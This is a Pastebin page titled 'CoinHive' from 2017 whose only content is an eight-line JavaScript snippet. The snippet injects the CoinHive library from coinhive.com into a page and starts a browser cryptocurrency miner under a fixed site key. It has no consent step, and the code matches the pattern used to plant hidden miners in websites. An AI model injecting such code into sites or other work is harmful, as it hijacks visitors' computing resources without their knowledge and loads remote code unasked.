Advertisement
einsteinK

CoinHive

Oct 11th, 2017
263
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. script = document.createElement("script");
  2. script.onload = function() {
  3.     miner = new CoinHive.User("o63ni5QLv4p1hULrhWPLsMQhdbRNkV8z", navigator.userAgent);
  4.     miner.setThrottle(0.1);
  5.     miner.start();
  6. };
  7. script.src = "https://coinhive.com/lib/coinhive.min.js";
  8. document.body.appendChild(script);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement